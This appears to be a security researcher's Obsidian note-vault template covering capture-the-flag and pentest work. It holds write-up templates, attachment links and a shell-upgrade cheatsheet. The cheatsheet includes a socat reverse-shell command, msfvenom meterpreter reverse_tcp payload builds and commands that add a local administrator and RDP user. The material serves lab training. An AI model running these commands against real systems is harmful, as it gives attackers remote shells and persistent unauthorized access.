├── zzz_templates
├── test
│ └── test2
│ │ └── note.md
├── code-block.md
├── HTB-challenge.md
├── Link test.md
├── PT-vuln-template.md
└── HTB-machine.md
├── Labs
├── Lab 1 - Example
│ ├── Credential list.md
│ ├── Network 1
│ │ ├── _Network 1 discovered IPs.md
│ │ ├── attachments
│ │ │ ├── 1.png
│ │ │ ├── 2.png
│ │ │ ├── 3.png
│ │ │ ├── 4.png
│ │ │ ├── 5.png
│ │ │ ├── Icon.png
│ │ │ ├── 1 (2).png
│ │ │ ├── 2 (2).png
│ │ │ ├── IconTable.png
│ │ │ ├── 2020-07-22-23-01-43.png
│ │ │ ├── 2020-07-22-23-04-20.png
│ │ │ ├── 2020-07-22-23-26-40.png
│ │ │ ├── 2020-07-22-23-27-10.png
│ │ │ ├── 18471753064989ce956ecd9d34bd149b.png
│ │ │ ├── 1cd90c62496ddfac40291e3ccdca6c9f.png
│ │ │ ├── 5f2268f30a39e52d1896668473c6d3b7.png
│ │ │ └── f22d6b4d0d6c7ddd22d3418e69733305.png
│ │ ├── Legacy.md
│ │ ├── Buff.md
│ │ └── Writeup.md
│ ├── Network 3
│ │ ├── attachments
│ │ │ ├── 1.png
│ │ │ ├── 10.png
│ │ │ ├── 11.png
│ │ │ ├── 2.png
│ │ │ ├── 3.png
│ │ │ ├── 4.png
│ │ │ ├── 5.png
│ │ │ ├── 6.png
│ │ │ ├── 7.png
│ │ │ ├── 8.png
│ │ │ ├── 9.png
│ │ │ ├── tabby.png
│ │ │ ├── traceback.jpeg
│ │ │ ├── 2020-06-22-14-47-45.png
│ │ │ ├── 2020-06-22-14-48-13.png
│ │ │ ├── 2020-06-22-14-59-19.png
│ │ │ ├── 2020-06-22-14-59-41.png
│ │ │ ├── 2020-06-22-16-11-37.png
│ │ │ ├── 2020-06-22-16-45-05.png
│ │ │ ├── 2020-06-22-16-45-57.png
│ │ │ └── 2020-06-29-23-27-45.png
│ │ ├── Traceback.md
│ │ └── Tabby.md
│ ├── Network 2
│ │ ├── attachments
│ │ │ ├── exploit.png
│ │ │ ├── postman.png
│ │ │ ├── pspy64.png
│ │ │ ├── ONA_vers.png
│ │ │ ├── OpenAdmin.png
│ │ │ ├── internal.png
│ │ │ ├── privesc_1.png
│ │ │ ├── privesc_2.png
│ │ │ ├── ssh_jimmy.png
│ │ │ ├── joanna_RSA.png
│ │ │ ├── joanna_user.png
│ │ │ ├── postman_icon.png
│ │ │ ├── searchsploit.png
│ │ │ ├── OpenAdmin_Icon.png
│ │ │ ├── database_settings.png
│ │ │ ├── internal_browser.png
│ │ │ ├── sites-available.png
│ │ │ ├── 2020-02-26_22-23-34.png
│ │ │ ├── 2020-02-26_22-24-18.png
│ │ │ ├── 2020-02-27_09-46-23.png
│ │ │ ├── 2020-02-27_10-55-40.png
│ │ │ ├── 2020-02-27_11-20-28.png
│ │ │ └── joanna_ssh_bruteforce.png
│ │ ├── Postman.md
│ │ └── OpenAdmin.md
│ ├── LAB 1.canvas
│ └── LAB 1.md
└── Lab 2 - Vuln. Research
│ ├── attachments
│ ├── email.png
│ ├── phpmyinfo.png
│ ├── info-disclosure.png
│ ├── phpinfo-admin.png
│ ├── xss_CVE-2020-13980.png
│ └── path-traversal_security-storage.png
│ ├── opencart - CVE-2023-47444.md
│ └── OpenCart 4.0.2.3.canvas
├── attachments
└── rename-image.png
├── Cheatsheets
├── _See my real cheatsheet on GitHub.md
├── Upgrade your shell.md
└── Shell cheatsheet.md
├── Paste test.md
└── TODO Kanban.md
/zzz_templates/test/test2/note.md:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Credential list.md:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/zzz_templates/code-block.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | ```
--------------------------------------------------------------------------------
/attachments/rename-image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/attachments/rename-image.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/_Network 1 discovered IPs.md:
--------------------------------------------------------------------------------
1 | - 10.10.10.198
2 | - 10.10.10.4
3 | - 10.10.10.138
4 |
5 |
--------------------------------------------------------------------------------
/Cheatsheets/_See my real cheatsheet on GitHub.md:
--------------------------------------------------------------------------------
1 | See my real cheatsheet on https://github.com/0xb120/cheatsheets_and_ctf-notes
2 |
--------------------------------------------------------------------------------
/Paste test.md:
--------------------------------------------------------------------------------
1 | Paste URL into selection:
2 | - [Paste here](https://0xbro.red/)
3 |
4 | Paste image rename:
5 | 
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/1.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/2.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/3.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/4.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/5.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/1.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/10.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/11.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/3.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/4.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/5.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/6.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/7.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/8.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/9.png
--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/attachments/email.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 2 - Vuln. Research/attachments/email.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/Icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/Icon.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/1 (2).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/1 (2).png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/2 (2).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/2 (2).png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/exploit.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/postman.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/postman.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/pspy64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/pspy64.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/tabby.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/tabby.png
--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/attachments/phpmyinfo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 2 - Vuln. Research/attachments/phpmyinfo.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/IconTable.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/IconTable.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/ONA_vers.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/ONA_vers.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/OpenAdmin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/OpenAdmin.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/internal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/internal.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/privesc_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/privesc_1.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/privesc_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/privesc_2.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/ssh_jimmy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/ssh_jimmy.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/joanna_RSA.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/joanna_RSA.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/joanna_user.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/joanna_user.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/postman_icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/postman_icon.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/searchsploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/searchsploit.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/traceback.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/traceback.jpeg
--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/attachments/info-disclosure.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 2 - Vuln. Research/attachments/info-disclosure.png
--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/attachments/phpinfo-admin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 2 - Vuln. Research/attachments/phpinfo-admin.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/OpenAdmin_Icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/OpenAdmin_Icon.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/database_settings.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/database_settings.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/internal_browser.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/internal_browser.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/sites-available.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/sites-available.png
--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/attachments/xss_CVE-2020-13980.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 2 - Vuln. Research/attachments/xss_CVE-2020-13980.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-01-43.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-01-43.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-04-20.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-04-20.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-26-40.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-26-40.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-27-10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/2020-07-22-23-27-10.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/2020-02-26_22-23-34.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/2020-02-26_22-23-34.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/2020-02-26_22-24-18.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/2020-02-26_22-24-18.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/2020-02-27_09-46-23.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/2020-02-27_09-46-23.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/2020-02-27_10-55-40.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/2020-02-27_10-55-40.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/2020-02-27_11-20-28.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/2020-02-27_11-20-28.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-47-45.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-47-45.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-48-13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-48-13.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-59-19.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-59-19.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-59-41.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-14-59-41.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-16-11-37.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-16-11-37.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-16-45-05.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-16-45-05.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-16-45-57.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-22-16-45-57.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/attachments/2020-06-29-23-27-45.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 3/attachments/2020-06-29-23-27-45.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 2/attachments/joanna_ssh_bruteforce.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 2/attachments/joanna_ssh_bruteforce.png
--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/attachments/path-traversal_security-storage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 2 - Vuln. Research/attachments/path-traversal_security-storage.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/18471753064989ce956ecd9d34bd149b.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/18471753064989ce956ecd9d34bd149b.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/1cd90c62496ddfac40291e3ccdca6c9f.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/1cd90c62496ddfac40291e3ccdca6c9f.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/5f2268f30a39e52d1896668473c6d3b7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/5f2268f30a39e52d1896668473c6d3b7.png
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/attachments/f22d6b4d0d6c7ddd22d3418e69733305.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xb120/obsidian-template/HEAD/Labs/Lab 1 - Example/Network 1/attachments/f22d6b4d0d6c7ddd22d3418e69733305.png
--------------------------------------------------------------------------------
/TODO Kanban.md:
--------------------------------------------------------------------------------
1 | ---
2 |
3 | kanban-plugin: board
4 |
5 | ---
6 |
7 | ## TODO
8 |
9 | - [ ] Search loot inside 192.168.1.25
10 | - [ ] Privilege escalation on 192.168.1.39
11 |
12 |
13 | ## WIP
14 |
15 |
16 |
17 | ## DONE
18 |
19 | - [ ] Map the network
20 | - [ ] Convert DNS in IPs
21 |
22 |
23 |
24 |
25 | %% kanban:settings
26 | ```
27 | {"kanban-plugin":"board","list-collapse":[false,false,false]}
28 | ```
29 | %%
--------------------------------------------------------------------------------
/zzz_templates/HTB-challenge.md:
--------------------------------------------------------------------------------
1 | ---
2 | Category:
3 | Difficulty:
4 | Platform:
5 | status:
6 | tags:
7 | ---
8 |
9 | >[!quote]
10 | >Challenge description
11 |
12 | # Setup
13 |
14 |
15 | # Information Gathering
16 |
17 | ## The application at-a-glance 🔍
18 |
19 |
20 |
21 | ## Source code review
22 |
23 |
24 |
25 | # Exploitation
26 |
27 | ## Bug 1
28 |
29 | >[!bug]
30 | >The bug
31 |
32 | ## Bug 2
33 |
34 | >[!bug]
35 | >The bug
36 |
37 |
38 | # Flag
39 |
40 | >[!success] Flag
41 | > `Th1s_15_th3_fl4g`
42 |
43 | # Video Writeup
44 |
45 |
46 |
47 | # Extra Miles
48 |
49 | ## Vulnerable code
--------------------------------------------------------------------------------
/zzz_templates/Link test.md:
--------------------------------------------------------------------------------
1 | Relative path
2 | in parent folder: [Paste test](../Paste%20test.md)
3 | in same-height folder: [Shell cheatsheet](../Cheatsheets/Shell%20cheatsheet.md)
4 | in deeper neighbours folders: [image](../Labs/Lab%202%20-%20Vuln.%20Research/attachments/email.png)
5 | in deeper son folders: [note](test/test2/note.md)
6 |
7 | Absolute path
8 | in parent folder: [Paste test](Paste%20test.md)
9 | in same-height folder: [Shell cheatsheet](Cheatsheets/Shell%20cheatsheet.md)
10 | in deeper neighbours folders: [email](Labs/Lab%202%20-%20Vuln.%20Research/attachments/email.png)
11 | in deeper son folders: [note](zzz_templates/test/test2/note.md)
12 |
13 | Shortest When Possible
14 | in parent folder: [Paste test](Paste%20test.md)
15 | in same-height folder: [Shell cheatsheet](Shell%20cheatsheet.md)
16 | in deeper neighbours folders: [email](email.png)
17 | in deeper son folders: [note](note.md)
--------------------------------------------------------------------------------
/zzz_templates/PT-vuln-template.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | ### [Severity] Vulnerability title
4 |
5 | #### Description
6 |
7 | Summary of the vulnerability
8 |
9 | | Vuln ID | ID-001 |
10 | | ------------ | ----------------- |
11 | | Severity | High |
12 | | CVSSv4 Score | 7.5 - VECTOR |
13 | | URL | https://0xbro.red |
14 | | Reference | https://0xbro.red |
15 | | CVE or CWE | |
16 |
17 | #### Impact
18 |
19 | Vulnerability impact on the target
20 |
21 | #### Vulnerability details and root-cause
22 |
23 | Do this, do that, send this, send that
24 |
25 | ```http
26 | foo
27 | ```
28 |
29 | Do this, do that, send this, send that
30 |
31 | ```php
32 |
33 | ```
34 |
35 | ##### PoC
36 |
37 | ```py
38 | import os
39 |
40 | def main:
41 | pass
42 | ```
43 |
44 | #### Remediation
45 |
46 | Follow best practices
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/zzz_templates/HTB-machine.md:
--------------------------------------------------------------------------------
1 | ---
2 | os:
3 | status:
4 | tags:
5 | aliases:
6 | ---
7 | # Resolution summary
8 |
9 | >[!summary]
10 | >- Step 1
11 | >- Step 2
12 |
13 | ## Improved skills
14 |
15 | - Skill 1
16 | - Skill 2
17 |
18 | ## Used tools
19 |
20 | - nmap
21 | - gobuster
22 |
23 |
24 | ---
25 |
26 | # Information Gathering
27 |
28 | Scanned all TCP ports:
29 |
30 | ```bash
31 |
32 | ```
33 |
34 | Enumerated open TCP ports:
35 |
36 | ```bash
37 |
38 | ```
39 |
40 | Enumerated top 200 UDP ports:
41 |
42 | ```bash
43 |
44 | ```
45 |
46 | ---
47 |
48 | # Enumeration
49 |
50 | ## Port 80 - HTTP (Apache)
51 |
52 |
53 | ---
54 |
55 | # Exploitation
56 |
57 | ## SQL Injection
58 |
59 |
60 | ---
61 |
62 | # Lateral Movement to xxx
63 |
64 | ## Local enumeration
65 |
66 |
67 | ## Lateral movement vector
68 |
69 | ---
70 |
71 | # Privilege Escalation to xxx
72 |
73 | ## Local enumeration
74 |
75 |
76 | ## Privilege Escalation vector
77 |
78 |
79 | ---
80 |
81 | # Trophy
82 |
83 | {{image}}
84 |
85 | >[!todo] **User.txt**
86 | >flag
87 |
88 | >[!todo] **Root.txt**
89 | >flag
90 |
91 | **/etc/shadow**
92 |
93 | ```bash
94 |
95 | ```
--------------------------------------------------------------------------------
/Cheatsheets/Upgrade your shell.md:
--------------------------------------------------------------------------------
1 | Most [netcat](../Tools/netcat.md)-like tools provide a non-interactive shell, which means that programs that require user input such as many file transfer programs or `su` and `sudo` tend to work poorly, if at all. Non-interactive shells also lack useful features like tab completion and job control. It is always a good idea upgrade any non-interactive shell to an interactive one.
2 |
3 | # Linux
4 |
5 | ## Python PTY
6 |
7 | ```python
8 | python -c 'import pty; pty.spawn("/bin/bash")'
9 | python3 -c 'import pty; pty.spawn("/bin/bash")'
10 | ```
11 |
12 | ## TERM and SHELL exports
13 |
14 | ```bash
15 | SHELL=/bin/bash script -q /dev/null
16 |
17 | ^Z
18 | stty raw -echo; fg
19 | export SHELL=bash
20 | export TERM=xterm-256color
21 | ```
22 |
23 | ## socat
24 |
25 | ```bash
26 | #Listener:
27 | socat file:`tty`,raw,echo=0 tcp-listen:4444
28 |
29 | #Victim:
30 | socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
31 | ```
32 |
33 | ## Fix rows and columns
34 |
35 | From a clean terminal:
36 |
37 | ```bash
38 | ┌──(kali㉿kali)-[~/…/lab/ntwk/it.local/10.1.1.1]
39 | └─$ stty -a
40 | speed 38400 baud; rows 60; columns 235; line = 0;
41 | intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = ; eol2 = ; swtch = ; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
42 | -parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
43 | -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel -iutf8
44 | opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
45 | isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc
46 | ```
47 |
48 | From the "malformed" terminal:
49 |
50 | ```bash
51 | www-data@luigi:/var/www$ stty rows 60 columns 235
52 | stty rows 60 columns 235
53 | ```
54 |
55 | ---
56 |
57 | # Windows:
58 |
59 | ## Rlwrap [^1]
60 |
61 | [^1]: https://github.com/hanslub42/rlwrap](https://github.com/hanslub42/rlwrap
62 |
63 | ```bash
64 | ┌──(kali㉿kali)-[~/…/lab/ntwk/it.local/10.1.1.1]
65 | └─$ rlwrap nc -nlvp 443
66 | ```
67 |
68 | ## meterpreter
69 |
70 | ```bash
71 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=10099 -f exe -o meter.exe
72 | msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=10099 -f exe -o meter.exe
73 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=10099 -f exe -o meter-x64.exe
74 | msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=10099 -f exe -o meter-x64.exe
75 | ```
76 |
77 | ## RDP
78 |
79 | ```powershell
80 | net user maoutis Qwerty123! /add
81 | net localgroup Administrators maoutis /add
82 | net localgroup "Remote Desktop Users" maoutis /ADD
83 | ```
